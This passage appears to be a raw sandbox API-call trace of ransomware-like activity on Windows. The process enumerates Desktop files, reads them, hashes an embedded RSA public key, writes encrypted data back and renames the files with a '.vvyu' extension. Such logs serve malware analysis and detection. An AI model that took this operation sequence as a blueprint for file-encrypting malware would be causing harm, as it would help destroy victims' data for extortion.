dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0188.668] GetCurrentThreadId () returned 0x5d8 [0188.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee800 [0188.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.668] GetCurrentThreadId () returned 0x5d8 [0188.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da18 [0188.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9b8 [0188.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9d0 [0188.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9a0 [0188.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da30 [0188.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0188.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da00 [0188.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9e8 [0188.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da48 [0188.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9e8 [0188.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9b8 [0188.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0188.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0188.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0188.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0188.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0188.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0188.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2848 | out: hHeap=0x2c0000) returned 1 [0188.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.682] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x10ac4, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x10ac4, lpOverlapped=0x0) returned 1 [0188.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.683] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10ac9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.684] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0188.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0188.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.685] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0188.685] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.685] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.685] CloseHandle (hObject=0x584) returned 1 [0188.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0188.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.687] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\xnJF1rqEtdtxtC.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\xnjf1rqetdtxtc.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\xnJF1rqEtdtxtC.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\xnjf1rqetdtxtc.mkv.vvyu")) returned 1 [0188.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.691] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.695] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe240cd00, ftCreationTime.dwHighDateTime=0x1d89f4f, ftLastAccessTime.dwLowDateTime=0x90791d0, ftLastAccessTime.dwHighDateTime=0x1d8a3ec, ftLastWriteTime.dwLowDateTime=0x90791d0, ftLastWriteTime.dwHighDateTime=0x1d8a3ec, nFileSizeHigh=0x0, nFileSizeLow=0xd9a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YA9u.mp3", cAlternateFileName="")) returned 1 [0188.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2848 [0188.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0188.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2848 | out: hHeap=0x2c0000) returned 1 [0188.695] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YA9u.mp3") returned=".mp3" [0188.695] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YA9u.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\ya9u.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.696] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=55717) returned 1 [0188.696] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.700] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd97f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.700] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.702] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.702] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xd9a5, lpOverlapped=0x0) returned 1 [0188.703] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.703] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.703] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.703] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.704] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.704] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.704] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.704] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.704] GetLastError () returned 0x0 [0188.704] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.704] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.705] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.705] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.705] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd9b0) returned 0x2af5168 [0188.705] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2848 [0188.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d988 [0188.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2890 [0188.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9a0 [0188.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9d0 [0188.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da30 [0188.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9e8 [0188.706] 